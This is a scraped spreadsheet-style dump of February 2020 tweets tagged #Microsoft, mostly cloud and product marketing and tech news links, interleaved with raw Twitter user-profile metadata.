    <t>{'id': 1227158386803908608, 'id_str': '1227158386803908608', 'name': 'Jobs2InboxU', 'screen_name': 'jobs2_u', 'location': '', 'description': 'Latest jobs and vacancies just for our followers.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 154, 'listed_count': 0, 'created_at': 'Tue Feb 11 09:12:33 +0000 2020', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 325, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227158572729016320/EbbNqEHO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227158572729016320/EbbNqEHO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227158386803908608/1581412593',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</si>
  <si>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#Windows10 Latest Update is Deleting Users File Again https://t.co/eFlPVUnrCM #Microsoft #tekwire #tekwirellc #networksecurity #internetsecurity https://t.co/E59KRMwMW4</t>
  </si>
  <si>
    <t>{'id': 1209843264259387393, 'id_str': '1209843264259387393', 'name': 'Tekwire', 'screen_name': 'TekwireLLC', 'location': 'Somerville, MA', 'description': 'Tekwire provides you a best internet and network security provider. To get in touch with the internet security service provider, just dial 8444796777.', 'url': 'https://t.co/xAwGBMInus', 'entities': {'url': {'urls': [{'url': 'https://t.co/xAwGBMInus', 'expanded_url': 'https://tek-wire.net', 'display_url': 'tek-wire.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Dec 25 14:28:14 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1209843377170075648/j8V3LJbn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209843377170075648/j8V3LJbn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209843264259387393/1577284953',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</si>
  <si>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17:26:32 +0000 2020</t>
  </si>
  <si>
    <t>#Oracle and #Microsoft have added to their #cloud interconnect strategy with the addition of a high-speed, private connection between Oracle Cloud Infrastructure and #Azure in the #EU. https://t.co/vdcXR2mHBL https://t.co/nkSF9oiq2F</t>
  </si>
  <si>
    <t>{'id': 1923520392, 'id_str': '1923520392', 'name': 'ANR Consulting Group', 'screen_name': 'ANRCG', 'location': 'Dallas, TX', 'description': 'ANR helps its clients with assessing their IT business needs,software/hardware selection, implementation/upgrade, business process re-engineering, IT Staffing', 'url': 'http://t.co/IVbccah4v1', 'entities': {'url': {'urls': [{'url': 'http://t.co/IVbccah4v1', 'expanded_url': 'http://www.anrcg.com', 'display_url': 'anrcg.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 263, 'friends_count': 532, 'listed_count': 70, 'created_at': 'Tue Oct 01 13:59:28 +0000 2013', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1318,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'http://pbs.twimg.com/profile_images/580793354859900928/iLW9IBy4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/580793354859900928/iLW9IBy4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1923520392/1427293416',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</si>
  <si>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17:26:28 +0000 2020</t>
  </si>
  <si>
    <t>#Oracle and #Microsoft have added to their #cloud interconnect strategy with the addition of a high-speed, private connection between Oracle Cloud Infrastructure and #Azure in the #EU. https://t.co/DduHrY5HbB https://t.co/xfGJ5em7NG</t>
  </si>
  <si>
    <t>{'id': 17370012, 'id_str': '17370012', 'name': 'Four Cornerstone', 'screen_name': 'fourcornerstone', 'location': 'Fort Worth, Texas', 'description': 'Four Cornerstone is an Oracle Preferred Business Partner and  servicesâ€™ firm based in Fort Worth, Texas.', 'url': 'http://t.co/ULgkoJtIkn', 'entities': {'url': {'urls': [{'url': 'http://t.co/ULgkoJtIkn', 'expanded_url': 'http://www.fourcornerstone.com', 'display_url': 'fourcornerstone.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1134, 'friends_count': 1624, 'listed_count': 177, 'created_at': 'Thu Nov 13 17:49:52 +0000 2008', 'favourites_count': 1080, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8135, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF6600', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/482540055223734275/90ZjYvtv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482540055223734275/90ZjYvtv_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17370012/1404164779', 'profile_link_color': 'FF8000', 'profile_sidebar_border_color': 'D66611', 'profile_sidebar_fill_color': 'DCE3DC', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 17:26:03 +0000 2020</t>
  </si>
  <si>
    <t>Why Azure Sphere From #Microsoft Is A Big Deal For The #IoT Ecosystem https://t.co/IYmbCmXp2r The #AzureSphere MCU integrates real-time processing capabilities with ability to run a high-level operating system. It boots to a hardened, purpose-built #Linux OS thats highly #secure https://t.co/E4tCVL4E6U</t>
  </si>
  <si>
    <t>Wed Feb 26 17:25:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft previews #Microsoft #DefenderATP for #Linux   https://t.co/duNBs6jzjP by @ZDNet</t>
  </si>
  <si>
    <t>Wed Feb 26 17:24:34 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Kr00k Bug in Broadcom, Cypress WiFi Chips Leaks Sensitive Info:" https://t.co/em1GYk7TcP
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 17:22:55 +0000 2020</t>
  </si>
  <si>
    <t>Students need healthy physical learning spaces in order to do their best work. How are you creating environments to help your students learn? Check out this infographic for more on how #Microsoft technology creates flexible learning spaces. https://t.co/H2UtwJglnc</t>
  </si>
  <si>
    <t>Wed Feb 26 17:22:37 +0000 2020</t>
  </si>
  <si>
    <t>The best iOS developer #Microsoft just launched their #sudoku game on the App Store, how nice 
But if you want to play a smoother one, try this: https://t.co/qZ3IebCy36 https://t.co/3wKO5XIPOc</t>
  </si>
  <si>
    <t>{'id': 791151793917034496, 'id_str': '791151793917034496', 'name': 'morecats', 'screen_name': 'devmorecats', 'location': 'Shanghai', 'description': 'Indie developer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 164, 'listed_count': 2, 'created_at': 'Wed Oct 26 05:37:41 +0000 2016', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 591, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/975348180916232192/rmwhgOlK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/975348180916232192/rmwhgOlK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/791151793917034496/1577095507',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</si>
  <si>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17:20:47 +0000 2020</t>
  </si>
  <si>
    <t>Taking this  to a new level. And this time, we brought our friends from @SevOneInc and @ParkMyCloud with us... #Cloud #Kubernetes #DevOps #microservices #containers #Cisco #Microsoft #AWS #IBM #Google https://t.co/bIyYp4xgWD</t>
  </si>
  <si>
    <t>Wed Feb 26 17:20:20 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Get your Citrix ADC-hosted sites ready for Chrome 80 SameSite changes: " https://t.co/mMOwLAShks
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Wed Feb 26 17:19:31 +0000 2020</t>
  </si>
  <si>
    <t>Former #Microsoft engineer convicted for stealing over $10M in digital currency, using ##BitcoinMixing service - #BTC #Crime #Cryptocurrency #DepartmentOfJustice #DoJ #VolodymyrKvashuk - https://t.co/5InB6mFfYT</t>
  </si>
  <si>
    <t>Wed Feb 26 17:19:12 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365, businesses of all sizes can work anywhere together, work easier and worry less. Davyn's #Cloud team members are always available to demo Office 365 to your #Business at any time. https://t.co/It45okz4Ut #DavynTT #CloudServices #MSPartners https://t.co/qvM5h9CxAv</t>
  </si>
  <si>
    <t>Wed Feb 26 17:18:48 +0000 2020</t>
  </si>
  <si>
    <t>Get help putting the right technology in your school. Learn how #Microsoft devices enable better learning outcomes.    #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/KEnrEE33DN</t>
  </si>
  <si>
    <t>Wed Feb 26 17:17:40 +0000 2020</t>
  </si>
  <si>
    <t>Session sneak-peaks are out for our upcoming Secure.Transform.Empower conference in Raleigh on March 19th! Check 'em out and save your seat today! #syntechusa #mspartner #SecureTransformEmpower2020 #Microsoft
https://t.co/CbAf8m3c6U https://t.co/DnrVQpqES0</t>
  </si>
  <si>
    <t>Wed Feb 26 17:17:38 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/UoN51hhXCJ</t>
  </si>
  <si>
    <t>Wed Feb 26 17:17:32 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available https://t.co/NIsbJG7quW #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Feb 26 17:16:30 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to soon reveal Universal Print, a cloud-based print infrastructure service that eliminates Print Servers - MSPoweruser https://t.co/MBnTsCgSUV #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:15:36 +0000 2020</t>
  </si>
  <si>
    <t>Upcoming changes to the Azure AD sign-in experience https://t.co/OVcricEnuB #AzureAD #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:15:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Gives Xbox Ones Home Page Another Redesign https://t.co/N7ud6oeWDT
via @Gadgets360 #computing #microsoft #videogames #xbox https://t.co/xjIbStURRM</t>
  </si>
  <si>
    <t>Wed Feb 26 17:14:53 +0000 2020</t>
  </si>
  <si>
    <t>5 Productivity-boosting features of #Office365 that may have passed you by! Our VP of Innovation, @tim_kulp unlocks hidden features!  
#Microsoft #Productivity #worksmarter 
https://t.co/Li7sPQCops</t>
  </si>
  <si>
    <t>{'id': 18231871, 'id_str': '18231871', 'name': 'Mind Over Machines', 'screen_name': 'mindovrmachines', 'location': 'Owings Mills, MD', 'description': 'Three decades strong data and software consultancy that helps organizations capture new revenue, grow competitive advantage, and streamline operations', 'url': 'http://t.co/2Ax2OQgPBA', 'entities': {'url': {'urls': [{'url': 'http://t.co/2Ax2OQgPBA', 'expanded_url': 'http://www.MindOverMachines.com', 'display_url': 'MindOverMachines.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 658, 'friends_count': 1206, 'listed_count': 86, 'created_at': 'Fri Dec 19 02:10:25 +0000 2008', 'favourites_count': 1526, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4956, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A93339', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/881911510699839488/cp1A2XgL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881911510699839488/cp1A2XgL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18231871/1510850918', 'profile_link_color': '8D2128', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'C2C2C2', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 17:14:21 +0000 2020</t>
  </si>
  <si>
    <t>The package has arrived!!! #teamSurfacePro
#surfacepro7
#Microsoft https://t.co/rekzlecsgb</t>
  </si>
  <si>
    <t>{'id': 33116869, 'id_str': '33116869', 'name': 'Slick', 'screen_name': 'AYO_SLICK', 'location': '', 'description': 'USAF jet mechanic| husband &amp; father | Big time gamer part time mixer streamer.\nFollow me on Mixer.', 'url': 'https://t.co/UE2Mb0ZR1Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/UE2Mb0ZR1Y', 'expanded_url': 'https://mixer.com/AyoSlick23', 'display_url': 'mixer.com/AyoSlick23', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 299, 'friends_count': 492, 'listed_count': 0, 'created_at': 'Sun Apr 19 03:35:03 +0000 2009', 'favourites_count': 783, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17466,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'http://pbs.twimg.com/profile_images/1138233622488633345/w-Cn9Vuv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138233622488633345/w-Cn9Vuv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33116869/1515269049',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</si>
  <si>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17:14:06 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Virtual Network service endpoint policies feature is now available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/F95l2w0lBx</t>
  </si>
  <si>
    <t>Wed Feb 26 17:13:50 +0000 2020</t>
  </si>
  <si>
    <t>Upcoming changes to the Azure AD sign-in experience https://t.co/2nuVQU9LFW #Microsoft #IdentityManagement #AccessManagement</t>
  </si>
  <si>
    <t>Wed Feb 26 17:13:38 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available
- prevent unauthorized access to Azure Storage accounts from your virtual network
https://t.co/NXqx0KoKqJ
#Azure #Microsoft #Cloud #Networking #Security https://t.co/GNAbnGCt91</t>
  </si>
  <si>
    <t>Wed Feb 26 17:11:39 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/dXAwRIzkNL</t>
  </si>
  <si>
    <t>Wed Feb 26 17:11:31 +0000 2020</t>
  </si>
  <si>
    <t>How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. #Microsoft #Azure secures your data from exploitation with built-in protections. https://t.co/mx0GUPcHFc</t>
  </si>
  <si>
    <t>Wed Feb 26 17:11:07 +0000 2020</t>
  </si>
  <si>
    <t>Considering #PowerBI or another set of #analytics tools? Dig into this white paper to see how you can leverage its current and future capabilities.      Learn more: Bubble Cloud #Microsoft. https://t.co/pbONb397IN</t>
  </si>
  <si>
    <t>Wed Feb 26 17:10:06 +0000 2020</t>
  </si>
  <si>
    <t>Check this out, Lakunzo will draw your diagram (Network, Electrical, Mechanical, Architectural, etc.) using Visio, Edraw and others on @fiverr for $25
#Serverless #Visio #networks #fiverrseller #Fiverr #Microsoft #mechanical #drawing
https://t.co/T78T9aYsG4</t>
  </si>
  <si>
    <t>Wed Feb 26 17:09:42 +0000 2020</t>
  </si>
  <si>
    <t>Dedicated to @Microsoft @Azure, the European Azure Conference [Nice,2-4 June 2020]. Developers, IT Pros, Cloud Professionals this is a must for your calendar
https://t.co/d6l7uB2ggM
@EuropeanSP @valointranet @Office365 #IT #Cloud
#Conference #CloudComputing #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 17:08:57 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft #Dynamics365 can help elevate and transform your customers' journey by creating consistent, personalized experiences. Subscribe today. https://t.co/NFWhjuy195</t>
  </si>
  <si>
    <t>Wed Feb 26 17:08:27 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Dynamics365, Techminds Group can bring your #salesforce the embedded intelligence they need to succeed -- right at their fingertips! Get case studies, tips and more on #Dynamics365 from #Microsoft and Techminds Group. Subscribe now! https://t.co/VE4D1uanhz</t>
  </si>
  <si>
    <t>{'id': 387774051, 'id_str': '387774051', 'name': 'Techminds Group Llc', 'screen_name': 'TechmindsGroup', 'location': 'Rochelle Park, NJ', 'description': 'Microsoft Partner and IT Services Firm in Rochelle Park, NJ. Follow us for info. or visit us at https://t.co/4Wp0wm99bB', 'url': 'http://t.co/cWkDCDHDxR', 'entities': {'url': {'urls': [{'url': 'http://t.co/cWkDCDHDxR', 'expanded_url': 'http://www.techmindsllc.com', 'display_url': 'techmindsllc.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/4Wp0wm99bB', 'expanded_url': 'http://www.techmindsllc.com', 'display_url': 'techmindsllc.com', 'indices': [96, 119]}]}}, 'protected': False, 'followers_count': 60, 'friends_count': 84, 'listed_count': 13, 'created_at': 'Sun Oct 09 17:03:42 +0000 2011', 'favourites_count': 77, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 726,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'http://pbs.twimg.com/profile_images/775056713355497472/B_lqU0B3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775056713355497472/B_lqU0B3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/387774051/1474911447',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</si>
  <si>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17:07:44 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure #cloud      How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. MS Azure secures your data from exploitation with built-in protections. https://t.co/AKqLdJLljc</t>
  </si>
  <si>
    <t>Wed Feb 26 17:06:09 +0000 2020</t>
  </si>
  <si>
    <t>Just blogged: Microsoft Audits and the Subtle Art of Compliant Cloud Migration https://t.co/RKduwFx4iT #Microsoft #Cloud #Blog https://t.co/GNQki1skD9</t>
  </si>
  <si>
    <t>Wed Feb 26 17:05:46 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact GHA Technologies, Inc. to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/DK68fjYriX</t>
  </si>
  <si>
    <t>Wed Feb 26 17:05:02 +0000 2020</t>
  </si>
  <si>
    <t>Build a data analytics solution with #Microsoft #PowerPlatform today and create the foundation for tomorrow's end-to-end data analytics. Subscribe now to see how. https://t.co/k9r4tVUMzf</t>
  </si>
  <si>
    <t>Wed Feb 26 17:04:54 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft Cloud and #Microsoft365, Sisnarine Technologies Inc. can help you assess and manage compliance risk, protect sensitive data and respond efficiently to data discovery requests. Subscribe now to stay informed! https://t.co/zmWhusdIjX</t>
  </si>
  <si>
    <t>Wed Feb 26 17:04:41 +0000 2020</t>
  </si>
  <si>
    <t>Subscribe to discover how #Dynamics365 and other #Microsoft solutions can help you elevate and transform engagements with both existing and prospective customers. https://t.co/awuzQIhYr6</t>
  </si>
  <si>
    <t>{'id': 15613469, 'id_str': '15613469', 'name': 'danawebpro', 'screen_name': 'danawebpro', 'location': 'Atlanta, Georgia', 'description': 'Dana Web Pro provides technology expertise to help build your business. Try Microsoft 365 Now Free! Our website builder Free!', 'url': 'https://t.co/PGXLWRrxqI', 'entities': {'url': {'urls': [{'url': 'https://t.co/PGXLWRrxqI', 'expanded_url': 'http://www.danawebpro.com', 'display_url': 'danawebpro.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2457, 'friends_count': 4884, 'listed_count': 41, 'created_at': 'Sat Jul 26 19:22:35 +0000 2008', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13404,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'http://pbs.twimg.com/profile_images/57281049/logo_1__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/57281049/logo_1__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15613469/1362845416',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</si>
  <si>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17:04:35 +0000 2020</t>
  </si>
  <si>
    <t>Knowledge is power--subscribing is empowerment. Discover how #Microsoft #Dynamics365 can empower your organization with the know-how and tools to gain sales momentum, boost productivity, and close more deals by subscribing to this channel. https://t.co/Zk0Owryrot</t>
  </si>
  <si>
    <t>Wed Feb 26 17:04:03 +0000 2020</t>
  </si>
  <si>
    <t>Helping to make #technology safer for every person and organization on the planet :) Our Defender #antivirus #software will become available for #Android and #iOS devices later this year. #Microsoft https://t.co/ZysMvzOswZ</t>
  </si>
  <si>
    <t>Wed Feb 26 17:03:59 +0000 2020</t>
  </si>
  <si>
    <t>Know the signsis outdated accounting software putting your business at risk? Download the free Business Owner's Guide to Replacing Accounting Software.   #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/ZlK6yV8CT1</t>
  </si>
  <si>
    <t>Wed Feb 26 17:03:07 +0000 2020</t>
  </si>
  <si>
    <t>Follow this link to get $50 OFF your registration for Azure + AI Conference coming April 6-9, 2020 in Orlando, FL. https://t.co/ieveTnMpEc
Chris Pietschmann (@crpietschmann) will be giving sessions on #AzureIoT stream processing and #Azure #IoT #Security!
#azureaiconf #Microsoft https://t.co/eNKx0VUlGQ</t>
  </si>
  <si>
    <t>Wed Feb 26 17:02:51 +0000 2020</t>
  </si>
  <si>
    <t>Take A Look At The Microsoft Endpoint Manager Documentation And Export Tool I Created On #GitHub. 
https://t.co/y2GuepCj4U
#Microsoft #OS</t>
  </si>
  <si>
    <t>{'id': 2265907914, 'id_str': '2265907914', 'name': 'Deployment Artist', 'screen_name': 'DeployArtist', 'location': '', 'description': 'Publisher - Books, Courseware, and Videos-trainings for the inner Geek', 'url': 'http://t.co/eqg5V4hK9w', 'entities': {'url': {'urls': [{'url': 'http://t.co/eqg5V4hK9w', 'expanded_url': 'http://deploymentartist.com/', 'display_url': 'deploymentartist.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 380, 'friends_count': 9, 'listed_count': 14, 'created_at': 'Sat Dec 28 13:28:21 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/416925749853962240/W3eNkGlw_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/416925749853962240/W3eNkGlw_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2265907914/1572625780',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</si>
  <si>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17:02:32 +0000 2020</t>
  </si>
  <si>
    <t>Can Taking Zinc Help Shorten Your Cold?
https://t.co/WInZNvqUJn
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:01:35 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 17:01:22 +0000 2020</t>
  </si>
  <si>
    <t>The Jobs Module in Business Central can strengthen any Project Management Team. Join us for this 7-part series and register for the second webinar Jobs 102:Key Concepts and Setup Procedures in Business Central today!
https://t.co/vRgPRIpCQ9 
#microsoft #webinar #jobs #technology https://t.co/XAHZ0i833X</t>
  </si>
  <si>
    <t>Wed Feb 26 17:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Check out our new video about migrations of clustered file servers located in 2 different Active Directory domains. https://t.co/uNAsfMkGdt #it #Microsoft #Windows #FileServer #storage #datacenter #datacentre #sysadmin #ITpro #TechSupport #WinServ #WinSrv #WindowsServer</t>
  </si>
  <si>
    <t>Wed Feb 26 17:00:46 +0000 2020</t>
  </si>
  <si>
    <t>Our web application called dataZen BSLTM powered by #Microsoft #Azure shows all the product related information on a finger touch.
"#Information about #products is as important as the products themselves."
#BigData #ECommerce #DataScience #DataAnalytics #SupplyChain #Iot https://t.co/9FTqGrLJs4</t>
  </si>
  <si>
    <t>Wed Feb 26 17:00:44 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that the @XBox One S also comes in an All- Digital edition with the #XBox All Access Program? #Microsoft #partnerwithliftforward. https://t.co/OqLO0SK6RF</t>
  </si>
  <si>
    <t>{'id': 2220481964, 'id_str': '2220481964', 'name': 'Liftforward', 'screen_name': 'LiftForward', 'location': 'New York City', 'description': "Disrupting financial services. If you sell to SMB's, imagine what offering them subscription and membership financing for your products/services can do.", 'url': 'http://t.co/b4GemX9WQI', 'entities': {'url': {'urls': [{'url': 'http://t.co/b4GemX9WQI', 'expanded_url': 'http://www.liftforward.com', 'display_url': 'liftforward.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1257, 'friends_count': 1734, 'listed_count': 101, 'created_at': 'Thu Nov 28 23:14:30 +0000 2013', 'favourites_count': 82, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1031,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'http://pbs.twimg.com/profile_images/412788372944322560/UQFP__H6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/412788372944322560/UQFP__H6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2220481964/1521811549', 'profile_link_color': 'F68A36',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</si>
  <si>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17:00:12 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/nyNRZCFxYG</t>
  </si>
  <si>
    <t>Wed Feb 26 17:00:05 +0000 2020</t>
  </si>
  <si>
    <t>This is a relative old e-book but the explanantion of the concepts around containers, orchestration I found useful. #Kubernetes #docker #Azure #microsoft #containerizeyourapps https://t.co/hsOUAUt1bx #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Feb 26 16:57:33 +0000 2020</t>
  </si>
  <si>
    <t>#Video of #Microsoft #Surface Duos #Peek #feature #shows how the dual-screen #handset will... https://t.co/k80uTy3nil</t>
  </si>
  <si>
    <t>#Video of #Microsoft #Surface Duos #Peek #feature #shows how the dual-screen #handset will... https://t.co/OcZcL7vH7e</t>
  </si>
  <si>
    <t>Wed Feb 26 16:56:48 +0000 2020</t>
  </si>
  <si>
    <t>Little confused about the new #microsoft #edge new tab settings page. I have a button to customize it, but that just seems to open that new tab. Is this inaccessible? @msftenable</t>
  </si>
  <si>
    <t>{'id': 59423319, 'id_str': '59423319', 'name': 'Florian Beijers', 'screen_name': 'zersiax', 'location': 'Gelderland, Netherlands', 'description': '26-year-old web developer and musician  in the Arnhem area. Accessibility, linguistics and music are my hobbies, learning more about life as I go along :)', 'url': 'https://t.co/BbaKwH4IXc', 'entities': {'url': {'urls': [{'url': 'https://t.co/BbaKwH4IXc', 'expanded_url': 'https://someday.something-will-be.here', 'display_url': 'someday.something-will-be.here', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1974, 'friends_count': 456, 'listed_count': 62, 'created_at': 'Thu Jul 23 10:42:07 +0000 2009', 'favourites_count': 80, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 45905,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'http://pbs.twimg.com/profile_images/562219451274113024/GgpGl3xC_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/562219451274113024/GgpGl3xC_normal.jpeg',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</si>
  <si>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16:55:35 +0000 2020</t>
  </si>
  <si>
    <t>#ECS Secures Seventh #Microsoft Gold for Data #Analytics and #BigData - AiThority: #ECS Secures Seventh #Microsoft Gold for Data #Analytics and #BigData  AiThority https://t.co/ejzEDwXiPU https://t.co/nxAI3NNSJV</t>
  </si>
  <si>
    <t>Wed Feb 26 16:55:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #semantic #search advances state of the art in #NLP: Turing Natural Language Generation (T-NLG) is a 17 billion parameter language model that can directly answer questions w a complete sentence, answer w/o context, summarize #AI #EmergingTech https://t.co/4aiNKrIPJC https://t.co/CBdDaeFz3G</t>
  </si>
  <si>
    <t>{'id': 720545088225587200, 'id_str': '720545088225587200', 'name': 'Connected Data London', 'screen_name': 'Connected_Data', 'location': 'London, England', 'description': 'Connecting Data, People &amp; Ideas since 2016. Using relationships, meaning, context in Data to achieve great things #KnowledgeGraph #GraphDB #AI #semantic #tech', 'url': 'https://t.co/nRFMr3aVtM', 'entities': {'url': {'urls': [{'url': 'https://t.co/nRFMr3aVtM', 'expanded_url': 'http://connected-data.london/', 'display_url': 'connected-data.london', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2596, 'friends_count': 4902, 'listed_count': 90, 'created_at': 'Thu Apr 14 09:31:50 +0000 2016', 'favourites_count': 1018, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3372,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'http://pbs.twimg.com/profile_images/723478571243737089/7R2nhJ6R_normal.jpg', 'profile_image_url_https': 